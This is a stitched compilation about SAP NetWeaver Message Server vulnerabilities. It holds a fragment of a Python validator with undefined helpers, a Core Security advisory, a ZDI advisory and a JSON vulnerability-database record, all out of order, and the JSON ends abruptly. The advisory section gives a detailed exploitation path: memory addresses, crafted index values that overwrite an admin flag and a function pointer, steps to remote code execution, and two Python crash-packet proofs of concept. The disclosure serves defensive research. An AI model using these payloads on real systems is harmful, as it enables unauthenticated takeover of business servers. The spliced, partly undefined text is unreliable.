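def new_stat_table(stat_len=J2EE_STAT_SERVICES_LEN):
    """Per-service counters mirroring the first two MSJ2EE_STAT_ELEMENT
    fields updated by the listing (totalMsgCount, totalMsgLength)."""
    return [{"totalMsgCount": 0, "totalMsgLength": 0} for _ in range(stat_len)]


def add_statistics(stats, buf):
    """Hardened counterpart of _MsJ2EE_AddStatistics: parse, validate, then
    account. Returns the index updated; on rejection the table is untouched."""
    hdr = validate_header(parse_header(buf), len(stats))
    entry = stats[hdr["serviceid"]]
    entry["totalMsgCount"] += 1
    entry["totalMsgLength"] += hdr["totallength"]
    return hdr["serviceid"]


def classify(stats, buf):
    """Log-friendly wrapper: ('ok', index) or ('rejected', reason)."""
    try:
        return ("ok", add_statistics(stats, buf))
    except HeaderRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    table = new_stat_table()
    good = build_header(serviceid=3, totallength=120, currentlength=120,
                        totalblocks=1, currentblock=1)
    # serviceid taken from the advisory's example of an out-of-range index
    bad = build_header(serviceid=0x038E3315, totallength=1, currentlength=1)
    for name, pkt in (("in-range", good), ("advisory index", bad),
                      ("truncated", good[:10])):
        print(name, classify(table, pkt))
```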

A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below:

/-----
00000000 MSADM_s struc ; (sizeof=0x538, standard type)
00000000               ; XREF: .data:dummy_clientr
00000000 client_type dd ?       ; enum MS_CLIENT_TYPE
00000004 stat dd ?              ; enum MS_STAT
00000008 connection_ID dd ?
0000000C status db ?
0000000D dom db ?               ; XREF: MsSFillCon+3Cw
0000000E admin_allowed db ?
0000000F db ?                   ; undefined
00000010 name dw 40 dup(?)
[...]
00000534 _padding db 4 dup(?)
00000538 MSADM_s ends
-----/

The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client:

/-----
.text:004230DC loc_4230DC:                           ; CODE XREF: MsSLoginClient+AAAj
.text:004230DC                                       ; MsSLoginClient+B26j
.text:004230DC cmp     byte ptr [edi+0Eh], 0         ; privileged client?
.text:004230E0 jnz     short loc_4230EA              ; if yes, jump
.text:004230E2 mov     al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable...
.text:004230E7 mov     [edi+0Eh], al                 ; ...and save it to MSADM_s.admin_allowed
-----/

So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different from 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0':

/-----
.data:008F17F0 ; int ms_admin_allowed
.data:008F17F0 ms_admin_allowed dd ?   ; DATA XREF: MsSSetMonitor+7Ew
.data:008F17F0                         ; MsSLoginClient+B62r
-----/

And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0':

/-----
.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]
.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>)
.data:0090B9E0                         ; DATA XREF: _MsJ2EE_AddStatistics+24o
.data:0090B9E0                         ; _MsJ2EE_AddStatistics+4Co ...
-----/

So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server.

After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation:

  1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections.
  2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server.

8.1.1. Gaining remote code execution by overwriting function pointers

Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet.

One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters:

/-----
.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]

; function pointers associated to the modification of the "ms/max_sleep" parameter
.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER

; function pointers associated to the modification of the "ms/max_vhost" parameter
.data:0087DED0                 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \
.data:0087DED0                                              offset MsSTestInteger, \   ; <-- we can overwrite this one
.data:0087DED0                                              offset MsSSetMaxVirtHost>

[...]
-----/

By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]', effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set').

After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function:

/-----
.text:00404DB3 loc_404DB3:                   ; CODE XREF: MsSChangeParam+CDj
.text:00404DB3 lea     esi, [edi+edi*2]
.text:00404DB6 mov     edi, [ebp+pvalue]
.text:00404DB9 add     esi, esi
.text:00404DBB mov     edx, ms_changeable_parameter.test[esi+esi]
.text:00404DC2 add     esi, esi
.text:00404DC4 push    edi
.text:00404DC5 push    pname
.text:00404DC6 call    edx                   ; call our overwritten function pointer
-----/

'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array.

8.1.2. Modify the configuration and behavior of the server

After gaining administrative privileges for our connections, it is possible to send 'MS_SET_PROPERTY' packets to the Message Server in order to modify its configuration and behavior. That makes it possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps:

  1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'.
  2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number).

The following python code can be used to trigger the vulnerability:

/-----
def send_attack(connection):
    print "[*] Sending crash packet"
    crash = '**MESSAGE**\x00'   # eyecatcher
    crash+= '\x04'              # version
    crash+= '\x00'              # errorno
    crash+= server_name         # toname
    crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    crash+= '\x04\x0d'          # flag/iflag
    crash+= client_string       # fromname
    crash+= '\x00\x00'          # padd

    crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd"
    crash+= "\x00\x00\x00\x01"
    crash+= "\xff\xff\xff\xff"
    crash+= "\x00\x00\x00\x00"
    send_packet(connection, crash)

    print "[*] Crash sent !"
-----/

8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module.

The following python code can be used to trigger the vulnerability:

/-----
def send_attack(connection):
    print "[*] Sending crash packet"
    crash = '**MESSAGE**\x00'   # eyecatcher
    crash+= '\x04'              # version
    crash+= '\x00'              # errorno
    crash+= server_name         # toname
    crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key
    crash+= '\x04\x05'          # flag/iflag
    crash+= client_string       # fromname
    crash+= '\x00\x00'          # padd

    crash+= "AD-EYECATCH\x00"
    crash+= "\x01\x01"
    crash+= "%11d" % 104
    crash+= "%11d" % 1
    crash+= "\x15\x00\x00\x00"
    crash+= "\x20\x00\x00\xc8"
    crash+= "LALA" + ' '*(20-4)
    crash+= "LOLO" + ' '*(40-4)
    crash+= " "*36
    send_packet(connection, crash)

    print "[*] Crash sent !"
-----/

9. Report Timeline

. 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013.
. 2012-12-10: Core sends an advisory draft with technical details and a PoC.
. 2012-12-11: The SAP team confirms the reception of the issue.
. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day on Feb 12th 2013.
. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013.
. 2012-12-28: SAP notifies Core that they will be contacted if tests fail in order to re-schedule the advisory publication.
. 2013-01-22: First release date missed.
. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned.
. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosure on Feb 12th. Core also asks for additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to the security bulletin, CVEs, and patches in order to verify whether those patches effectively fix the reported flaws.
. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVEs were assigned to them. Those vulnerabilities seem to be related to ZDI advisories [6], [7], [8].
. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks for additional information regarding the affected and patched version numbers.
. 2013-02-01: SAP notifies that the security note 1800603 will be released and that the note will provide further information regarding this vulnerability.
. 2013-02-13: Advisory CORE-2012-1128 published.

10. References

[1] http://www.sap.com/platform/netweaver/index.epx
[2] SAP Security note Feb 2013: https://service.sap.com/sap/support/notes/1800603
[3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm
[4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm
[5] SAP Security notes Feb 2012: https://service.sap.com/sap/support/notes/1649840
[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/
[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/
[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/

11. About CoreLabs

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

12. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

13. Disclaimer

The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. PGP/GPG Keys

This advisory has been signed with the GPG key of the Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-104
June 27, 2012

-- CVE ID:

-- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C

-- Affected Vendors: SAP

-- Affected Products: SAP NetWeaver

-- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407.

-- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section40

-- Disclosure Timeline:
2011-10-28 - Vulnerability reported to vendor
2012-06-27 - Coordinated public release of advisory

-- Credit: This vulnerability was discovered by:
e6af8de8b1d4b2b6d5ba2610cbf9cd38

-- About the Zero Day Initiative (ZDI): Established by TippingPoint, the Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-0833",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netweaver",
        "scope": null,
        "trust": 2.1,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "sap",
        "version": "2004s"
      },
      {
        "model": "netweaver abap",
        "scope": null,
        "trust": 1.2,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "7.30"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "7.02"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "7.01"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.01 sr1"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.02 sp06"
      },
      {
        "model": "netweaver",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": "7.30 sp04"
      },
      {
        "model": "netweaver abap null",
        "scope": "eq",
        "trust": 0.4,
        "vendor": "sap",
        "version": "*"
      },
      {
        "model": "netweaver 2004s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sap",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:sr1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:sp06:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:sp04:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver:2004s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "e6af8de8b1d4b2b6d5ba2610cbf9cd38",
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      }
    ],
    "trust": 2.1
  },
  "cve": "CVE-2013-1593",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2013-1593",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-112",
            "impactScore": 8.5,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-111",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "ZDI",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "ZDI-12-104",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.7,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": null,
            "accessVector": null,
            "authentication": null,
            "author": "IVD",
            "availabilityImpact": null,
            "baseScore": null,
            "confidentialityImpact": null,
            "exploitabilityScore": null,
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "impactScore": null,
            "integrityImpact": null,
            "severity": null,
            "trust": 0.2,
            "vectorString": null,
            "version": "unknown"
          },
          {
            "accessComplexity": null,
            "accessVector": null,
            "authentication": null,
            "author": "IVD",
            "availabilityImpact": null,
            "baseScore": null,
            "confidentialityImpact": null,
            "exploitabilityScore": null,
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "impactScore": null,
            "integrityImpact": null,
            "severity": null,
            "trust": 0.2,
            "vectorString": null,
            "version": "unknown"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2013-1593",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-1593",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-112",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-111",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "ZDI",
            "id": "ZDI-12-104",
            "trust": 0.7,
            "value": "HIGH"
          },
          {
            "author": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "HIGH"
          },
          {
            "author": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "trust": 0.2,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2013-1593",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1593"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007128"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1593"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \\x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. \nThe following products are affected:\nSAP Netweaver 2004s\nSAP Netweaver 7.01 SR1\nSAP Netweaver 7.02 SP06\nSAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nCORE-2012-1128\n\n\n1. 
*Advisory Information*\n\nTitle: SAP Netweaver Message Server Multiple Vulnerabilities\nAdvisory ID: CORE-2012-1128\nAdvisory URL:\nhttp://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities\nDate published: 2013-02-13\nDate of last update: 2013-02-13\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n\n2. *Vulnerability Information*\n\nClass: Improper Validation of Array Index [CWE-129], Buffer overflow\n[CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2013-1592, CVE-2013-1593\n\n\n\n3. By sending different messages,\nthe different vulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n   . Older versions are probably affected too, but they were not checked. \n\n5. *Non-vulnerable packages*\n\n   . Vendor did not provide this information. \n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note 1800603 [2] regarding these issues. \n\n\n7. *Credits*\n\nVulnerability [CVE-2013-1592] was discovered by Martin Gallo and\nFrancisco Falcon, and additional research was performed by Francisco\nFalcon. Vulnerability [CVE-2013-1593] was discovered and researched by\nMartin Gallo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Fernando Miranda from Core Advisories\nTeam. \n\n\n8. 
